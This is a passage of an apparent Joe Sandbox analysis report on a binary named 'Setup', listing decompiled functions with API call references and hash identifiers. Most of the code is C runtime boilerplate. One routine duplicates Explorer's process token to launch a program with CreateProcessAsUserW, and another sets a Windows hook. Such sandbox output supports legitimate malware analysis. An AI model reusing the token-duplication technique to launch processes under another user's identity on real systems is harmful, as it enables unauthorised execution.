                                                                                                                                                              • Opcode Fuzzy Hash: 9c390c8b228b117941798a9353a1551da3fb7115f03c5a0abe938777e2469494
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0045716E() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				_t1 = E004570FC(0); // executed
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x00457170
                                                                                                                                                              0x00457176

                                                                                                                                                              APIs
                                                                                                                                                              • __encode_pointer.LIBCMT ref: 00457170
                                                                                                                                                                • Part of subcall function 004570FC: TlsGetValue.KERNEL32(00000000,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 0045710E
                                                                                                                                                                • Part of subcall function 004570FC: TlsGetValue.KERNEL32(00000005,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 00457125
                                                                                                                                                                • Part of subcall function 004570FC: RtlEncodePointer.NTDLL(00000000,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 00457163
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2585649348-0
                                                                                                                                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                              • Instruction ID: 4cff56d5ea146b4bd30a3f784e89dbd8dce4e4a2a3783387e5a5808369999fb2
                                                                                                                                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CoUninitialize.OLE32(?,0041A0C8), ref: 004EDEB3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3861434553-0
                                                                                                                                                              • Opcode ID: a5de02cbd1b11b3a82bc3a5a1e72936b420f8548ddea6dfcec47597dc26e73e4
                                                                                                                                                              • Instruction ID: 2a972c4fab728814f709459dfd4ff36875e05d45aa0f4f1982a65f74532dffed
                                                                                                                                                              • Opcode Fuzzy Hash: a5de02cbd1b11b3a82bc3a5a1e72936b420f8548ddea6dfcec47597dc26e73e4
                                                                                                                                                              • Instruction Fuzzy Hash: B490223000020C8B0200238038080E0330C88200323800000E00C000208B0020000080
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0044F1DA() {
                                                                                                                                                              				int _t3;
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				long _t7;
                                                                                                                                                              				long _t12;
                                                                                                                                                              				long _t17;
                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				LONG* _t29;
                                                                                                                                                              
                                                                                                                                                              				_t3 = IsProcessorFeaturePresent(0xc);
                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                              					_t23 = LoadLibraryA("kernel32.dll");
                                                                                                                                                              					__eflags = _t23;
                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                              						 *0x5bc844 = GetProcAddress(_t23, "InterlockedPushEntrySList");
                                                                                                                                                              						 *0x5bc848 = GetProcAddress(_t23, "InterlockedPopEntrySList");
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *0x5bc844; // 0x0
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						L12:
                                                                                                                                                              						_t5 = 0;
                                                                                                                                                              						__eflags = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eflags =  *0x5bc848; // 0x0
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							goto L12;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t29 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
                                                                                                                                                              							_t7 =  *_t29;
                                                                                                                                                              							__eflags = _t7;
                                                                                                                                                              							if(_t7 != 0) {
                                                                                                                                                              								L11:
                                                                                                                                                              								 *0x5bc840 = _t7;
                                                                                                                                                              								_t5 = 1;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t25 = HeapAlloc(GetProcessHeap(), 0, 8);
                                                                                                                                                              								__eflags = _t25;
                                                                                                                                                              								if(_t25 == 0) {
                                                                                                                                                              									goto L12;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *_t25 = 0;
                                                                                                                                                              									 *((intOrPtr*)(_t25 + 4)) = 0;
                                                                                                                                                              									_t12 = InterlockedCompareExchange(_t29, _t25, 0);
                                                                                                                                                              									__eflags = _t12;
                                                                                                                                                              									if(_t12 != 0) {
                                                                                                                                                              										HeapFree(GetProcessHeap(), 0, _t25);
                                                                                                                                                              									}
                                                                                                                                                              									_t7 =  *_t29;
                                                                                                                                                              									goto L11;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					return _t5;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t17 = _t3 + 1;
                                                                                                                                                              					 *0x5bc840 = _t17;
                                                                                                                                                              					return _t17;
                                                                                                                                                              				}
                                                                                                                                                              			}












                                                                                                                                                              APIs
                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,0044F2B0,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1DC
                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1F5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 0044F20F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 0044F21C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F24E
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F251
                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0044F267
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F274
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                              • String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
                                                                                                                                                              • API String ID: 3830925854-2586642590
                                                                                                                                                              • Opcode ID: 7a83753e704f731a755ff519826a143a61fd290225ef870a82e095b13b2b41f9
                                                                                                                                                              • Instruction ID: 14295b3ad7532e1049eeb092a543909dfedfbe3ce8ac3f2238d5ae29e678ce0a
                                                                                                                                                              • Opcode Fuzzy Hash: 7a83753e704f731a755ff519826a143a61fd290225ef870a82e095b13b2b41f9
                                                                                                                                                              • Instruction Fuzzy Hash: 27118275A40251AFFB609FB8AC88D573BE8FB68741B05467AF509C3210D7749C48DA64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0044F6C8(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				void* _v804;
                                                                                                                                                              				intOrPtr _v808;
                                                                                                                                                              				intOrPtr _v812;
                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                              				long _t17;
                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                              				intOrPtr* _t31;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                              				_t26 = __edi;
                                                                                                                                                              				_t25 = __edx;
                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                              				_t6 = __eax;
                                                                                                                                                              				_t34 = _t22 -  *0x561244; // 0xddd124f9
                                                                                                                                                              				if(_t34 == 0) {
                                                                                                                                                              					asm("repe ret");
                                                                                                                                                              				}
                                                                                                                                                              				 *0x5bca50 = _t6;
                                                                                                                                                              				 *0x5bca4c = _t22;
                                                                                                                                                              				 *0x5bca48 = _t25;
                                                                                                                                                              				 *0x5bca44 = _t21;
                                                                                                                                                              				 *0x5bca40 = _t27;
                                                                                                                                                              				 *0x5bca3c = _t26;
                                                                                                                                                              				 *0x5bca68 = ss;
                                                                                                                                                              				 *0x5bca5c = cs;
                                                                                                                                                              				 *0x5bca38 = ds;
                                                                                                                                                              				 *0x5bca34 = es;
                                                                                                                                                              				 *0x5bca30 = fs;
                                                                                                                                                              				 *0x5bca2c = gs;
                                                                                                                                                              				asm("pushfd");
                                                                                                                                                              				_pop( *0x5bca60);
                                                                                                                                                              				 *0x5bca54 =  *_t31;
                                                                                                                                                              				 *0x5bca58 = _v0;
                                                                                                                                                              				 *0x5bca64 =  &_a4;
                                                                                                                                                              				 *0x5bc9a0 = 0x10001;
                                                                                                                                                              				_t11 =  *0x5bca58; // 0x0
                                                                                                                                                              				 *0x5bc954 = _t11;
                                                                                                                                                              				 *0x5bc948 = 0xc0000409;
                                                                                                                                                              				 *0x5bc94c = 1;
                                                                                                                                                              				_t12 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v812 = _t12;
                                                                                                                                                              				_t13 =  *0x561248; // 0x222edb06
                                                                                                                                                              				_v808 = _t13;
                                                                                                                                                              				 *0x5bc998 = IsDebuggerPresent();
                                                                                                                                                              				_push(1);
                                                                                                                                                              				E00462ED7(_t14);
                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                              				_t17 = UnhandledExceptionFilter(0x51bce0);
                                                                                                                                                              				if( *0x5bc998 == 0) {
                                                                                                                                                              					_push(1);
                                                                                                                                                              					E00462ED7(_t17);
                                                                                                                                                              				}
                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                              			}




















                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00456FA2
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00456FB7
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0051BCE0), ref: 00456FC2
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00456FDE
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00456FE5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                              • Opcode ID: dae8808e2844de53dae41f92b29e3f4fc1baf063fbfcee6f5a19d921d93415a2
                                                                                                                                                              • Instruction ID: 185bcfbf4be3dc7a61062cf976b791f04ca67b78da15fcb050acc9240d4305d4
                                                                                                                                                              • Opcode Fuzzy Hash: dae8808e2844de53dae41f92b29e3f4fc1baf063fbfcee6f5a19d921d93415a2
                                                                                                                                                              • Instruction Fuzzy Hash: 9321FFB88013489FE790DF29F8856543FA4FB28314F50925AE80987B60E7B4698CEF5D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004C8C80(intOrPtr _a4) {
                                                                                                                                                              				int _t2;
                                                                                                                                                              				intOrPtr _t3;
                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                              				struct HHOOK__* _t7;
                                                                                                                                                              				intOrPtr _t8;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					if( *0x5bde20 == 1) {
                                                                                                                                                              						if( *0x5bde1c != 0) {
                                                                                                                                                              							_t7 =  *0x5bde1c; // 0x0
                                                                                                                                                              							_t2 = UnhookWindowsHookEx(_t7);
                                                                                                                                                              						}
                                                                                                                                                              						 *0x5bde1c = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t8 =  *0x5bde20; // 0x0
                                                                                                                                                              					 *0x5bde20 = _t8 - 1;
                                                                                                                                                              					return _t2;
                                                                                                                                                              				}
                                                                                                                                                              				if( *0x5bde20 == 0) {
                                                                                                                                                              					 *0x5bde1c = SetWindowsHookExW(2,  &M004C8BE0, 0, GetCurrentThreadId());
                                                                                                                                                              				}
                                                                                                                                                              				_t3 =  *0x5bde20; // 0x0
                                                                                                                                                              				_t4 = _t3 + 1;
                                                                                                                                                              				 *0x5bde20 = _t4;
                                                                                                                                                              				return _t4;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004C8C92
                                                                                                                                                              • SetWindowsHookExW.USER32(00000002,004C8BE0,00000000,00000000), ref: 004C8CA2
                                                                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 004C8CD5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HookWindows$CurrentThreadUnhook
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3577351977-0
                                                                                                                                                              • Opcode ID: c2a1efb184e29ff7a91679816487362cc365b89fc6dfbf4b1139dcfb18d8a44d
                                                                                                                                                              • Instruction ID: 78c62b7d4a257791ef89ff007e129983921d467873f45ba689db3b487d97da54
                                                                                                                                                              • Opcode Fuzzy Hash: c2a1efb184e29ff7a91679816487362cc365b89fc6dfbf4b1139dcfb18d8a44d
                                                                                                                                                              • Instruction Fuzzy Hash: 4CF0E7781002009FE7909F55EC09B6276B9B378305F10822EE5058E2A0EBBAB459EF79
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00502490(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				short _v22;
                                                                                                                                                              				short _v26;
                                                                                                                                                              				short _v30;
                                                                                                                                                              				short _v34;
                                                                                                                                                              				short _v36;
                                                                                                                                                              				char _v68;
                                                                                                                                                              				char _v69;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				signed int _t26;
                                                                                                                                                              				short _t28;
                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              
                                                                                                                                                              				_t53 = __esi;
                                                                                                                                                              				_t52 = __edi;
                                                                                                                                                              				_t39 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x508795);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t25 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t26 = _t25 ^ _t54;
                                                                                                                                                              				_v20 = _t26;
                                                                                                                                                              				_push(_t26);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					E00417A20(__ebx, _a4 + 4, __edi, __esi, 0, 0xffffffff);
                                                                                                                                                              				}
                                                                                                                                                              				_t28 =  *0x52aca4; // 0x0
                                                                                                                                                              				_v36 = _t28;
                                                                                                                                                              				_t40 = 0;
                                                                                                                                                              				_v34 = 0;
                                                                                                                                                              				_v30 = 0;
                                                                                                                                                              				_v26 = 0;
                                                                                                                                                              				_v22 = 0;
                                                                                                                                                              				_t51 =  &_v36;
                                                                                                                                                              				if(GetLocaleInfoW(0x400, 0x5a,  &_v36, 8) >= 2) {
                                                                                                                                                              					if(_a4 != 0) {
                                                                                                                                                              						E00417910( &_v36, E00434050( &_v69));
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004181D0(_a4,  &_v68);
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						_t40 =  &_v68;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              					}
                                                                                                                                                              					_t51 = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t30 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t30 = E00497500(_t40,  &_v36);
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t30 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t30, _t39, _v20 ^ _t54, _t51, _t52, _t53);
                                                                                                                                                              			}


















                                                                                                                                                              0x0050256f

                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000008,DDD124F9,?,00000000,00508795,000000FF,?,004E09FD,?,00000000,0000000C,0000005A,00000000), ref: 005024F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                              • Opcode ID: 17bd02d61d5eac9d1e5b27f2e83d14d2623f1d078f5f65820668711d61e4f906
                                                                                                                                                              • Instruction ID: 22c70dcdf994eba1062f3603a9771be6de007e099f53124ee60974792897218f
                                                                                                                                                              • Opcode Fuzzy Hash: 17bd02d61d5eac9d1e5b27f2e83d14d2623f1d078f5f65820668711d61e4f906
                                                                                                                                                              • Instruction Fuzzy Hash: A9217F71A04118EBDB04DFA4DC55BEEB7B4FF08314F10462EE516AB2D0EB345A05CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00495470(void* __edi, short* _a4, short* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				struct HWND__* _v24;
                                                                                                                                                              				long _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				int _v36;
                                                                                                                                                              				void* _v40;
                                                                                                                                                              				void* _v44;
                                                                                                                                                              				void* _v48;
                                                                                                                                                              				struct HINSTANCE__* _v52;
                                                                                                                                                              				_Unknown_base(*)()* _v56;
                                                                                                                                                              				char _v128;
                                                                                                                                                              				void* _v132;
                                                                                                                                                              				signed short* _t47;
                                                                                                                                                              				int _t49;
                                                                                                                                                              				int _t56;
                                                                                                                                                              				int _t57;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              
                                                                                                                                                              				_t85 = __edi;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					L2:
                                                                                                                                                              					return _t47;
                                                                                                                                                              				}
                                                                                                                                                              				_t47 = _a4;
                                                                                                                                                              				if(( *_t47 & 0x0000ffff) != 0) {
                                                                                                                                                              					_v20 = 0;
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					_v12 = 0;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t49 = E00494F20(__eflags) & 0x000000ff;
                                                                                                                                                              					__eflags = _t49;
                                                                                                                                                              					if(_t49 != 0) {
                                                                                                                                                              						_v28 = 0;
                                                                                                                                                              						_t49 = FindWindowW(L"Progman", 0);
                                                                                                                                                              						_v24 = _t49;
                                                                                                                                                              						__eflags = _v24;
                                                                                                                                                              						if(_v24 != 0) {
                                                                                                                                                              							_t49 = GetWindowThreadProcessId(_v24,  &_v28);
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v28;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							_v32 = E00494F60(__eflags, _v28);
                                                                                                                                                              							_t49 = E00494F60(__eflags, GetCurrentProcessId());
                                                                                                                                                              							_v36 = _t49;
                                                                                                                                                              							__eflags = _v36 - 0x3000;
                                                                                                                                                              							if(_v36 == 0x3000) {
                                                                                                                                                              								__eflags = _v32 - 0x2000;
                                                                                                                                                              								if(_v32 == 0x2000) {
                                                                                                                                                              									_t49 = OpenProcess(0x1f0fff, 0, _v28);
                                                                                                                                                              									_v40 = _t49;
                                                                                                                                                              									__eflags = _v40;
                                                                                                                                                              									if(_v40 != 0) {
                                                                                                                                                              										_t56 = OpenProcessToken(_v40, 0xf01ff,  &_v44);
                                                                                                                                                              										__eflags = _t56;
                                                                                                                                                              										if(_t56 != 0) {
                                                                                                                                                              											_t57 = DuplicateTokenEx(_v44, 0xf01ff, 0, 2, 1,  &_v48);
                                                                                                                                                              											__eflags = _t57;
                                                                                                                                                              											if(_t57 != 0) {
                                                                                                                                                              												_v56 = 0;
                                                                                                                                                              												_v52 = LoadLibraryW(L"AdvApi32");
                                                                                                                                                              												__eflags = _v52;
                                                                                                                                                              												if(_v52 != 0) {
                                                                                                                                                              													_v56 = GetProcAddress(_v52, "CreateProcessAsUserW");
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = _v56;
                                                                                                                                                              												if(_v56 != 0) {
                                                                                                                                                              													_v132 = 0;
                                                                                                                                                              													E00451D90(_t85,  &_v128, 0, 0x40);
                                                                                                                                                              													_v56(_v48, _a4, _a8, 0, 0, 1, 0, 0, 0,  &_v132,  &_v20);
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = _v52;
                                                                                                                                                              												if(_v52 != 0) {
                                                                                                                                                              													FreeLibrary(_v52);
                                                                                                                                                              												}
                                                                                                                                                              												CloseHandle(_v48);
                                                                                                                                                              											}
                                                                                                                                                              											CloseHandle(_v44);
                                                                                                                                                              										}
                                                                                                                                                              										_t49 = CloseHandle(_v40);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v12;
                                                                                                                                                              					if(_v12 != 0) {
                                                                                                                                                              						return _t49;
                                                                                                                                                              					}
                                                                                                                                                              					return ShellExecuteW(0, L"open", _a4, _a8, 0, 5);
                                                                                                                                                              				}
                                                                                                                                                              				goto L2;
                                                                                                                                                              			}

                                                                                                                                                              0x004955e7
                                                                                                                                                              0x004955eb
                                                                                                                                                              0x004955f1
                                                                                                                                                              0x004955f1
                                                                                                                                                              0x004955fb
                                                                                                                                                              0x004955fb
                                                                                                                                                              0x00495605
                                                                                                                                                              0x00495605
                                                                                                                                                              0x0049560f
                                                                                                                                                              0x0049560f
                                                                                                                                                              0x00495538
                                                                                                                                                              0x0049551a
                                                                                                                                                              0x0049550d
                                                                                                                                                              0x004954df
                                                                                                                                                              0x00495615
                                                                                                                                                              0x00495619
                                                                                                                                                              0x00495637
                                                                                                                                                              0x00495637
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049562e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindWindowW.USER32(Progman,00000000), ref: 004954BE
